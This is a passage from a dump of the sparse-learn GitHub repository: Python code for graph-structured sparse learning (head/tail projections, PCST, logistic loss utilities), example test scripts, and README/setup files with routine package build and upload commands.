G.add_edge(edge[0], edge[1])\n pos = dict()\n index = 0\n for i in range(length):\n for j in range(width):\n G.add_node(index)\n pos[index] = (j, length - i)\n index += 1\n nx.draw_networkx_nodes(G, pos, node_size=100,\n nodelist=range(33 * 33), node_color='gray')\n nx.draw_networkx_nodes(G, pos, node_size=100,\n nodelist=sub_graph, node_color='b')\n nx.draw_networkx_edges(G, pos, alpha=0.5, width=2)\n plt.axis('off')\n plt.show()\n\n\ndef minimal_spanning_tree(edges, weights, num_nodes):\n \"\"\"\n Find the minimal spanning tree of a graph.\n :param edges: ndarray dim=(m,2) -- edges of the graph.\n :param weights: ndarray dim=(m,) -- weights of the graph.\n :param num_nodes: int, number of nodes in the graph.\n :return: (the edge indices of the spanning tree)\n \"\"\"\n try:\n from proj_module import mst\n except ImportError:\n print('cannot find this functions: proj_pcst')\n exit(0)\n select_indices = mst(edges, weights, num_nodes)\n return select_indices\n\n\ndef fast_pcst(edges, prizes, weights, root, g, pruning, epsilon, verbose):\n \"\"\"\n Fast PCST algorithm using C11 language\n :param edges:\n :param prizes:\n :param root:\n :param weights:\n :param g:\n :param pruning:\n :param verbose:\n :param epsilon: to control the precision\n :return:\n \"\"\"\n if not np.any(prizes): # make sure\n return np.asarray([], dtype=int), np.asarray([], dtype=int)\n if not (weights > 0.).all():\n print('all weights must be positive.')\n # TODO to check variables.\n return c_proj_pcst(edges, prizes, weights, root, g, pruning, epsilon, verbose)\n\n\nclass HeadTailWrapper(object):\n \"\"\"\n The Python wrapper for the head and tail approx. algorithms.\n \"\"\"\n\n def __init__(self, edges, weights):\n \"\"\" head and tail approximation package\n :param edges: ndarray[mx2] edges of the input graph\n :param weights: weights of edges\n \"\"\"\n self._edges = edges\n self._weights = weights\n if not (self._weights > 0.0).all():\n print('Error: all edge weights must be positive.')\n exit()\n\n def run_tail(self, x, g, s, budget, nu):\n \"\"\" Run tail approximation algorithm\n :param x: input vector for projection.\n :param g: number of connected components\n :param s: sparsity\n :param budget: budget\n :param nu: parameter nu used in the tail approx. algorithm.\n :return: (nodes, edges,proj_vector):\n projected nodes, edges and projected vector.\n \"\"\"\n return tail_proj(self._edges, self._weights, x, g, s, budget, nu)\n\n def run_head(self, x, g, s, budget, delta):\n \"\"\" Run head approximation algorithm.\n :param x: input vector for projection\n :param g: number of connected component\n :param s: sparsity parameter\n :param budget: budget\n :param delta: parameter delta used in the head approx. algorithm.\n :return: (nodes, edges,proj_vector):\n projected nodes, edges and projected vector.\n \"\"\"\n return head_proj(self._edges, self._weights, x, g, s, budget, delta)\n\n\ndef head_proj(edges, weights, x, g, s, budget=None, delta=None, max_iter=None,\n err_tol=None, root=None, pruning=None, epsilon=None, verbose=None):\n \"\"\"\n Head projection algorithm.\n :param edges: ndarray[mx2] edges of the input graph\n :param weights: weights of edges\n :param x: input vector for projection\n :param g: number of connected component\n :param s: sparsity parameter\n :param budget:\n :param delta:\n :param max_iter: maximal iterations in head projection.\n :param err_tol: error tolerance for lower bound search bound.\n :param root: -1, no root for pcst\n :param pruning:\n :param epsilon:\n :param verbose:\n :return:\n \"\"\"\n if budget is None:\n budget = 1. * (s - g)\n if delta is None:\n delta = 1. / 169.\n if max_iter is None:\n max_iter = 50\n if err_tol is None:\n err_tol = 1e-6\n if root is None:\n root = -1\n if pruning is None:\n pruning = 'strong'\n if verbose is None:\n verbose = 0\n if epsilon is None:\n epsilon = 1e-6\n # if it is a zero vector, then just return an empty graph\n if not np.any(x):\n p_x = np.zeros_like(x) # projected vector\n return np.asarray([], dtype=int), np.asarray([], dtype=int), p_x\n # [re_nodes, re_edges, p_x]\n return c_proj_head(edges, weights, x, g, s, budget, delta, max_iter, err_tol, root, pruning, epsilon, verbose)\n\n\ndef tail_proj(edges, weights, x, g, s, budget=None, nu=None,\n max_iter=None, err_tol=None, root=None, pruning=None, verbose=None, epsilon=None):\n \"\"\"\n Tail projection algorithm.\n :param edges: ndarray[mx2] edges of the input graph\n :param weights: weights of edges\n :param x: input vector for projection\n :param g: number of connected component\n :param s: sparsity parameter\n :param budget:\n :param nu:\n :param max_iter: maximal iterations\n :param err_tol:\n :param root: -1, no root for pcst\n :param pruning\n :param verbose\n :param epsilon\n :return:\n \"\"\"\n if budget is None:\n budget = 1. * (s - g)\n if nu is None:\n nu = 2.5\n if max_iter is None:\n max_iter = 50\n if err_tol is None:\n err_tol = 1e-6\n if root is None:\n root = -1\n if pruning is None:\n pruning = 'strong'\n if verbose is None:\n verbose = 0\n if epsilon is None:\n epsilon = 1e-6\n # if it is a zero vector, then just return an empty graph\n if not np.any(x):\n p_x = np.zeros_like(x) # projected vector\n return np.asarray([], dtype=int), np.asarray([], dtype=int), p_x\n # [re_nodes, re_edges, proj_x]\n return c_proj_tail(edges, weights, x, g, s, budget, nu, max_iter, err_tol, root, pruning, epsilon, verbose)\n" }, { "alpha_fraction": 0.4487379193305969, "alphanum_fraction": 0.4549703896045685, "avg_line_length": 40.14102554321289, "blob_id": "3ed497d36e5ac7d9b778003f4e0b348e32232f61", "content_id": "737c4ad83b091a16e9dd3c7bab3d7d20620c66d2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3209, "license_type": "permissive", "max_line_length": 72, "num_lines": 78, "path": "/sparse_learn/data_process.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['data_normalize', 'get_list_files']\nimport os\nimport numpy as np\n\n\ndef data_normalize(x_train, x_test, opts='min-max'):\n \"\"\" Normalize train and test directly.\"\"\"\n if opts == 'l2': # l2 normalization method\n for i in range(len(x_train)):\n for j in range(len(x_train[i])):\n vector = x_train[i][j, :]\n if np.linalg.norm(vector) != 0.0:\n x_train[i][j, :] = vector / np.linalg.norm(vector)\n else:\n x_train[i][j, :] = vector\n for i in range(len(x_test)):\n for j in range(len(x_test[i])):\n vector = x_test[i][j, :]\n if np.linalg.norm(vector) != 0.0:\n x_test[i][j, :] = vector / np.linalg.norm(vector)\n else:\n x_test[i][j, :] = vector\n elif opts == 'min-max': # min-max scaling method to [0,1]\n for ii in range(len(x_train)):\n for jj in range(len(x_train[ii])):\n vector = x_train[ii][jj, :]\n max_ = np.max(vector, axis=0)\n min_ = np.min(vector, axis=0)\n if max_ == min_:\n x_train[ii][jj, :] = vector\n else:\n x_train[ii][jj, :] = (vector - min_) / (max_ - min_)\n for ii in range(len(x_test)):\n for jj in range(len(x_test[ii])):\n vector = x_test[ii][jj, :]\n max_ = np.max(vector, axis=0)\n min_ = np.min(vector, axis=0)\n if max_ == min_:\n x_test[ii][jj, :] = vector\n else:\n x_test[ii][jj, :] = (vector - min_) / (max_ - min_)\n # standardization ( or Z-score normalization) normalize x to\n # [mu=0,std=1.] search:\n # [Sebastian Raschka About Feature Scaling and Normalization]\n # often used in logistic regression, SVMs, perceptrons, NNs\n elif opts == 'std':\n for i in range(len(x_train)):\n for j in range(len(x_train[i])):\n vector = x_train[i][j, :]\n mean_v = np.mean(vector)\n std_v = np.std(vector)\n if std_v != 0.0:\n x_train[i][j, :] = (vector - mean_v) / std_v\n else:\n x_train[i][j, :] = vector\n for i in range(len(x_test)):\n for j in range(len(x_test[i])):\n vector = x_test[i][j, :]\n mean_v = np.mean(vector)\n std_v = np.mean(vector)\n if np.linalg.norm(vector) != 0.0:\n x_test[i][j, :] = (vector - mean_v) / std_v\n else:\n x_test[i][j, :] = vector\n\n\ndef get_list_files(input_folder, prefix=None):\n if not os.path.exists(input_folder):\n file_list = []\n return file_list\n for (dir_path, dir_names, file_names) in os.walk(input_folder):\n file_list = sorted([os.path.join(input_folder, filename)\n for filename in file_names])\n if prefix is None or prefix == '':\n return file_list\n file_list = [_ for _ in file_list if _.find(prefix) != -1]\n return file_list\n" }, { "alpha_fraction": 0.488095223903656, "alphanum_fraction": 0.5, "avg_line_length": 13, "blob_id": "744c5f447ab5d29e0d15686c134ff8dc2ce48a6b", "content_id": "b609f6b7f5edbeddf9b1d22774cafadb71a12338", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "permissive", "max_line_length": 27, "num_lines": 6, "path": "/sparse_learn/algo_graph_da.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['algo_graph_da']\n\n\ndef algo_graph_da():\n pass\n" }, { "alpha_fraction": 0.5056179761886597, "alphanum_fraction": 0.516853928565979, "avg_line_length": 13.833333015441895, "blob_id": "1477877c4ee29248b8adf7acdebc085f56230af3", "content_id": "5ede096c53b915ffe0de2baf148df3b18cc8688d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "permissive", "max_line_length": 27, "num_lines": 6, "path": "/sparse_learn/algo_graph_sto_iht.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['algo_graph_da']\n\n\ndef algo_graph_sto_iht():\n pass\n" }, { "alpha_fraction": 0.5607082843780518, "alphanum_fraction": 0.6045531034469604, "avg_line_length": 41.35714340209961, "blob_id": "f27520ba3bc300ecf75d972f75ad1a2ca9ac38e1", "content_id": "79d3a6dcabf55172f0f561e8029874dce18985a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1186, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/sparse_learn/examples/example_test_proj.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sparse_learning.proj_algo import head_proj\nfrom sparse_learning.proj_algo import tail_proj\nfrom sparse_learning.fast_pcst import fast_pcst\nfrom sparse_learning.graph_utils import simu_graph\n\ndef test_proj_head():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = head_proj(edges=edges, weights=weights, x=x, g=1, s=4, budget=3.,\n delta=1. / 169., err_tol=1e-6, max_iter=30, root=-1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test1 result head nodes: ', re_nodes)\n print('test1 result head edges: ', re_edges)\n print(p_x)\n re = head_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n budget=3., delta=1. / 169., err_tol=1e-6, max_iter=30,\n root=-1, pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test2 result head nodes: ', re_nodes)\n print('test2 result head edges: ', re_edges)\n print(p_x)\n" }, { "alpha_fraction": 0.6328431367874146, "alphanum_fraction": 0.6392157077789307, "avg_line_length": 29.893939971923828, "blob_id": "163283661506e7c509962527375ea7f7989d701a", "content_id": "9cac59c6c816b35a02672a591b3cfd0078627045", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2040, "license_type": "permissive", "max_line_length": 73, "num_lines": 66, "path": "/README.md", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# sparse-learn\nThe sparse learning related methods.\n\n\n#---\n#!/usr/bin/env bash\n# this file is for uploading.\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\npython setup.py sdist bdist_wheel\ntwine upload dist/*.tar.gz\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nHow to run it ? python setup.py build_ext --inplace\n\"\"\"\nimport os\nimport numpy\nfrom os import path\nfrom setuptools import setup\nfrom distutils.core import Extension\n\nhere = path.abspath(path.dirname(__file__))\n\nsrc_files = ['c/main_wrapper.c', 'c/head_tail_proj.c', 'c/fast_pcst.c']\ncompile_args = ['-std=c11', '-lpython2.7', '-lm']\n# calling the setup function\nsetup(\n # sparse_learning package.\n name='sparse_learning',\n # current version is 0.2.1\n version='0.2.4',\n # this is a wrapper of head and tail projection.\n description='A wrapper for sparse learning algorithms.',\n # a long description should be here.\n long_description='This package collects sparse learning algorithms.',\n # url of github projection.\n url='https://github.com/baojianzhou/sparse_learning.git',\n # number of authors.\n author='Baojian Zhou',\n # my email.\n author_email='bzhou6@albany.edu',\n include_dirs=[numpy.get_include()],\n license='MIT',\n packages=['sparse_learning'],\n classifiers=(\"Programming Language :: Python :: 2\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",),\n # specify requirements of your package here\n install_requires=['numpy'],\n headers=['c/head_tail_proj.h', 'c/fast_pcst.h'],\n # define the extension module\n ext_modules=[Extension('proj_module',\n sources=src_files,\n language=\"C\",\n extra_compile_args=compile_args,\n include_dirs=[numpy.get_include()])],\n keywords='sparse learning, structure sparsity, head/tail projection')\n\nStep 1:\npip wheel /dir/to/proj-name/ -w /dir/where/wheels/are/written/\n\n" }, { "alpha_fraction": 0.5134063363075256, "alphanum_fraction": 0.5394887924194336, "avg_line_length": 34.624534606933594, "blob_id": "738c9350cf5956aa47fc07b6e2f09e041f01e8b5", "content_id": "b0502bd794125deea9e8edc8259588595f387b5d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9585, "license_type": "permissive", "max_line_length": 77, "num_lines": 269, "path": "/sparse_learn/base.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\n\n__all__ = ['expit', 'logistic_predict', 'node_pre_rec_fm',\n 'logit_loss_bl', 'node_pre_rec_fm', 'least_square_predict',\n 'logit_loss_grad_bl', 'logit_loss_grad', 'sensing_matrix']\n\n\ndef node_pre_rec_fm(true_feature, pred_feature):\n \"\"\"\n Return the precision, recall and f-measure.\n :param true_feature:\n :param pred_feature:\n :return: pre, rec and fm\n \"\"\"\n true_feature, pred_feature = set(true_feature), set(pred_feature)\n pre, rec, fm = 0.0, 0.0, 0.0\n if len(pred_feature) != 0:\n pre = len(true_feature & pred_feature) / float(len(pred_feature))\n if len(true_feature) != 0:\n rec = len(true_feature & pred_feature) / float(len(true_feature))\n if (pre + rec) > 0.:\n fm = (2. * pre * rec) / (pre + rec)\n return pre, rec, fm\n\n\ndef sensing_matrix(n, x, norm_noise=0.0):\n \"\"\" Generate a Gaussian matrix and corresponding n measurements.\n Please see equation 1.2 in [1]\n Reference:\n [1] Needell, Deanna, and Joel A. Tropp. \"CoSaMP: Iterative signal\n recovery from incomplete and inaccurate samples.\"\n Applied and computational harmonic analysis 26.3 (2009): 301-321.\n :param n: the number of measurements need to sensing.\n :param x: true signal.\n :param norm_noise: add noise by using: ||e|| = norm_noise.\n :return:\n x_mat: sensing matrix\n y_tr: measurement vector.\n y_e: measurement vector + ||e||\n \"\"\"\n p = len(x)\n x_mat = np.random.normal(0.0, 1.0, size=(n * p)) / np.sqrt(n)\n x_mat = x_mat.reshape((n, p))\n y_tr = np.dot(x_mat, x)\n noise_e = np.random.normal(0.0, 1.0, len(y_tr))\n y_e = y_tr + (norm_noise / np.linalg.norm(noise_e)) * noise_e\n return x_mat, y_tr, y_e\n\n\ndef expit(x):\n \"\"\"\n expit function. 1 /(1+exp(-x)). quote from Scipy:\n The expit function, also known as the logistic function,\n is defined as expit(x) = 1/(1+exp(-x)).\n It is the inverse of the logit function.\n expit is also known as logistic. Please see logistic\n :param x: np.ndarray\n :return: 1/(1+exp(-x)).\n \"\"\"\n out = np.zeros_like(x)\n posi = np.where(x > 0.0)\n nega = np.where(x <= 0.0)\n out[posi] = 1. / (1. + np.exp(-x[posi]))\n exp_x = np.exp(x[nega])\n out[nega] = exp_x / (1. + exp_x)\n return out\n\n\ndef logistic(x):\n \"\"\"\n logistic is also known as expit. Please see expit.\n :param x: np.ndarray\n :return:\n \"\"\"\n return expit(x)\n\n\ndef logistic_predict(x, wt):\n \"\"\"\n To predict the probability for sample xi. {+1,-1}\n :param x: (n,p) dimension, where p is the number of features.\n :param wt: (p+1,) dimension, where wt[p] is the intercept.\n :return: (n,1) dimension of predict probability of positive class\n and labels.\n \"\"\"\n n, p = x.shape\n pred_prob = expit(np.dot(x, wt[:p]) + wt[p])\n pred_y = np.ones(n)\n pred_y[pred_prob < 0.5] = -1.\n return pred_prob, pred_y\n\n\ndef least_square_predict(x_va, wt):\n \"\"\" To predict the probability for sample xi. \"\"\"\n pred_val, p = [], x_va.shape[1]\n for i in range(len(x_va)):\n pred_val.append(np.dot(wt[:p], x_va[i] + wt[p]))\n return np.asarray(pred_val)\n\n\ndef log_logistic(x):\n \"\"\" return log( 1/(1+exp(-x)) )\"\"\"\n out = np.zeros_like(x)\n posi = np.where(x > 0.0)\n nega = np.where(x <= 0.0)\n out[posi] = -np.log(1. + np.exp(-x[posi]))\n out[nega] = x[nega] - np.log(1. + np.exp(x[nega]))\n return out\n\n\ndef _grad_w(x_tr, y_tr, wt, eta):\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. \"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, p = wt[-1], x_tr.shape[1]\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n z = expit(yz)\n loss = -np.sum(log_logistic(yz)) + .5 * eta * np.dot(wt, wt)\n grad = np.zeros(p + 1)\n z0 = (z - 1) * y_tr\n grad[:p] = np.dot(x_tr.T, z0) + eta * wt\n grad[-1] = z0.sum()\n return loss, grad\n\n\ndef logit_loss_grad(x_tr, y_tr, wt, eta):\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. \"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, n, p = wt[-1], x_tr.shape[0], x_tr.shape[1]\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n z = expit(yz)\n loss = -np.sum(log_logistic(yz)) + .5 * eta * np.dot(wt, wt)\n grad = np.zeros(p + 1)\n z0 = (z - 1) * y_tr\n grad[:p] = np.dot(x_tr.T, z0) + eta * wt\n grad[-1] = z0.sum()\n return loss / float(n), grad / float(n)\n\n\ndef logit_loss_bl(x_tr, y_tr, wt, l2_reg, cp, cn):\n \"\"\"\n Calculate the balanced loss and gradient of the logistic function.\n :param x_tr: (n,p), where p is the number of features.\n :param y_tr: (n,), where n is the number of labels.\n :param wt: current model. wt[-1] is the intercept.\n :param l2_reg: regularization to avoid overfitting.\n :param cp:\n :param cn:\n :return:\n \"\"\"\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. \"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, n, p = wt[-1], x_tr.shape[0], x_tr.shape[1]\n posi_idx = np.where(y_tr > 0) # corresponding to positive labels.\n nega_idx = np.where(y_tr < 0) # corresponding to negative labels.\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n loss = -cp * np.sum(log_logistic(yz[posi_idx]))\n loss += -cn * np.sum(log_logistic(yz[nega_idx]))\n loss = loss / n + .5 * l2_reg * np.dot(wt, wt)\n return loss\n\n\ndef logit_loss_grad_bl(x_tr, y_tr, wt, l2_reg, cp, cn):\n \"\"\"\n Calculate the balanced loss and gradient of the logistic function.\n :param x_tr: (n,p), where p is the number of features.\n :param y_tr: (n,), where n is the number of labels.\n :param wt: current model. wt[-1] is the intercept.\n :param l2_reg: regularization to avoid overfitting.\n :param cp:\n :param cn:\n :return:\n \"\"\"\n \"\"\" return {+1,-1} Logistic (val,grad) on training samples. \"\"\"\n assert len(wt) == (x_tr.shape[1] + 1)\n c, n, p = wt[-1], x_tr.shape[0], x_tr.shape[1]\n posi_idx = np.where(y_tr > 0) # corresponding to positive labels.\n nega_idx = np.where(y_tr < 0) # corresponding to negative labels.\n grad = np.zeros_like(wt)\n wt = wt[:p]\n yz = y_tr * (np.dot(x_tr, wt) + c)\n z = expit(yz)\n loss = -cp * np.sum(log_logistic(yz[posi_idx]))\n loss += -cn * np.sum(log_logistic(yz[nega_idx]))\n loss = loss / n + .5 * l2_reg * np.dot(wt, wt)\n bl_y_tr = np.zeros_like(y_tr)\n bl_y_tr[posi_idx] = cp * np.asarray(y_tr[posi_idx], dtype=float)\n bl_y_tr[nega_idx] = cn * np.asarray(y_tr[nega_idx], dtype=float)\n z0 = (z - 1) * bl_y_tr # z0 = (z - 1) * y_tr\n grad[:p] = np.dot(x_tr.T, z0) / n + l2_reg * wt\n grad[-1] = z0.sum() # do not need to regularize the intercept.\n return loss, grad\n\n\ndef auc_node_fm(auc, node_fm):\n if 0.0 <= auc <= 1.0 and 0.0 <= node_fm <= 1.0:\n return 2.0 * (auc * node_fm) / (auc + node_fm)\n else:\n print('auc and node-fm must be in the range [0.0,1.0]')\n exit(0)\n\n\ndef m_print(result, method, trial_i, n_tr_, fig_i, mu, sub_graph,\n header=False):\n if header:\n print('-' * 165)\n print('method fig_i s tr_id '\n ' n_tr mu auc acc f1 ' +\n 'n_pre n_rec n_fm nega_in nega_out'\n ' posi_in posi_out intercept run_time')\n auc = result['auc'][-1]\n acc = result['acc'][-1]\n f1 = result['f1'][-1]\n node_pre = result['n_pre'][-1]\n node_rec = result['n_rec'][-1]\n node_fm = result['n_fm'][-1]\n num_nega_in = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind in sub_graph and _ < 0.0])\n num_nega_out = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind not in sub_graph and _ < 0.0])\n num_posi_in = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind in sub_graph and _ > 0.0])\n num_posi_out = len([_ for ind, _ in enumerate(result['wt'][-1]) if\n ind not in sub_graph and _ > 0.0])\n sparsity = np.count_nonzero(result['wt'][-1][:1089])\n intercept = result['intercept'][-1]\n run_time = result['run_time'][-1]\n print('{:14s} {:6s} {:6s} {:6s} {:6s} {:7.1f} '\n '{:7.4f} {:7.4f} {:7.4f} {:7.4f} {:7.4f} {:7.4f} '\n '{:8d} {:8d} {:8d} {:8d} {:12.4f} {:12.3f}'\n .format(method, fig_i, str(sparsity), str(trial_i), str(n_tr_),\n mu, auc, acc, f1, node_pre, node_rec, node_fm, num_nega_in,\n num_nega_out, num_posi_in, num_posi_out, intercept,\n run_time))\n\n\ndef gen_test_case(x_tr, y_tr, w0, edges, weights):\n f = open('test_case.txt', 'wb')\n f.write(b'P %d %d %d\\n' % (len(x_tr), len(x_tr[0]), len(edges)))\n for i in range(len(x_tr)):\n f.write(b'x_tr ')\n for j in range(len(x_tr[i])):\n f.write(b'%.8f' % x_tr[i][j] + b' ')\n f.write(str(y_tr[i]) + '\\n')\n for i in range(len(edges)):\n f.write(b'E ' + str(edges[i][0]) + b' ' +\n str(edges[i][1]) + b' ' + '%.8f' % weights[i] + b'\\n')\n for i in range(len(w0)):\n f.write(b'N %d %.8f\\n' % (i, w0[i]))\n f.close()\n\n\ndef test_expit():\n print(expit(np.asarray([0.0])))\n print(expit(np.asarray([-1.0, 1.0])))\n print(expit(np.asarray([-10.0, 10.0])))\n print(expit(np.asarray([-1e5, 1e5])))\n\n\ndef test_logistic():\n x = np.asarray([[0.1, 0.2], [1., 1.], [0., 0.], [-1., -1.]])\n w = np.asarray([-0.1, 1.0, 0.0])\n print('predicted probability: '),\n print(logistic_predict(x, w)[0])\n print('predicted labels: '),\n print(logistic_predict(x, w)[1])\n\n\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 21, "blob_id": "18788f4f3f29a64afe170acee70cdfb7fa55f99b", "content_id": "931715ff4d678a1da4392e00b9e2ac8eb62dc085", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22, "license_type": "permissive", "max_line_length": 21, "num_lines": 1, "path": "/__init__.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "name = \"sparse_learn\"\n" }, { "alpha_fraction": 0.5445544719696045, "alphanum_fraction": 0.584797203540802, "avg_line_length": 36.27381134033203, "blob_id": "7c2424561ab5801cad046d59d1ec9c9a46be94b8", "content_id": "e2d63a26936f2349bab22282d23596aeeb010c19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3131, "license_type": "permissive", "max_line_length": 78, "num_lines": 84, "path": "/sparse_learn/examples/example_graph_proj.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sparse_learn.proj_algo import head_proj\nfrom sparse_learn.proj_algo import tail_proj\nfrom sparse_learn.fast_pcst import fast_pcst\nfrom sparse_learn.graph_utils import simu_graph\n\n\ndef test_proj_head():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = head_proj(edges=edges, weights=weights, x=x, g=1, s=4, budget=3.,\n delta=1. / 169., err_tol=1e-6, max_iter=30, root=-1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test1 result head nodes: ', re_nodes)\n print('test1 result head edges: ', re_edges)\n print(p_x)\n re = head_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n budget=3., delta=1. / 169., err_tol=1e-6, max_iter=30,\n root=-1, pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test2 result head nodes: ', re_nodes)\n print('test2 result head edges: ', re_edges)\n print(p_x)\n\n\ndef test_proj_tail():\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = tail_proj(edges=edges, weights=weights, x=x, g=1, s=4, root=-1,\n max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test3 result tail nodes: ', re_nodes)\n print('test3 result tail edges: ', re_nodes)\n print(p_x)\n re = tail_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n root=-1, max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test4 result tail nodes: ', re_nodes)\n print('test4 result tail edges: ', re_nodes)\n print(p_x)\n\n\ndef test_pcst():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n n, m = len(weights), edges.shape[1]\n x = np.random.normal(0.0, 0.1, 25)\n sub_graph = [6, 7, 8, 9]\n x[sub_graph] = 5.\n # edges, prizes, weights, root, g, pruning, epsilon, verbose\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test7 result pcst nodes: ', re_nodes)\n print('test7 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=np.zeros(n), weights=weights, root=-1,\n g=1, pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test8 result pcst nodes: ', re_nodes)\n print('test8 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test9 result pcst nodes: ', re_nodes)\n print('test9 result pcst edges: ', re_nodes)\n\n\ndef main():\n test_proj_head()\n test_proj_tail()\n test_pcst()\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6126042604446411, "alphanum_fraction": 0.6181649565696716, "avg_line_length": 32.16923141479492, "blob_id": "86a04b98965a2bbf9f58e220a79195e16cbba4cf", "content_id": "a0e3b54fd4155cfd6c74827344f0086bac8e13d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2158, "license_type": "permissive", "max_line_length": 73, "num_lines": 65, "path": "/doc/readme.txt", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "\nUpload module:\npython setup.py sdist bdist_wheel\n\n# sparse-learn\nThe sparse learning related methods.\n#------------------------------------------------\n#!/usr/bin/env bash\n# this file is for uploading.\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\npython setup.py sdist bdist_wheel\ntwine upload dist/*.tar.gz\nrm -rf dist\nrm -rf build\nrm -rf sparse_learning.egg-info\n#------------------------------------------------\n\"\"\"\nHow to run it ? python setup.py build_ext --inplace\n\"\"\"\nimport os\nimport numpy\nfrom os import path\nfrom setuptools import setup\nfrom distutils.core import Extension\n\nhere = path.abspath(path.dirname(__file__))\n\nsrc_files = ['c/main_wrapper.c', 'c/head_tail_proj.c', 'c/fast_pcst.c']\ncompile_args = ['-std=c11', '-lpython2.7', '-lm']\n# calling the setup function\nsetup(\n # sparse_learning package.\n name='sparse_learning',\n # current version is 0.2.1\n version='0.2.4',\n # this is a wrapper of head and tail projection.\n description='A wrapper for sparse learning algorithms.',\n # a long description should be here.\n long_description='This package collects sparse learning algorithms.',\n # url of github projection.\n url='https://github.com/baojianzhou/sparse_learning.git',\n # number of authors.\n author='Baojian Zhou',\n # my email.\n author_email='bzhou6@albany.edu',\n include_dirs=[numpy.get_include()],\n license='MIT',\n packages=['sparse_learning'],\n classifiers=(\"Programming Language :: Python :: 2\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",),\n # specify requirements of your package here\n install_requires=['numpy'],\n headers=['c/head_tail_proj.h', 'c/fast_pcst.h'],\n # define the extension module\n ext_modules=[Extension('proj_module',\n sources=src_files,\n language=\"C\",\n extra_compile_args=compile_args,\n include_dirs=[numpy.get_include()])],\n keywords='sparse learning, structure sparsity, head/tail 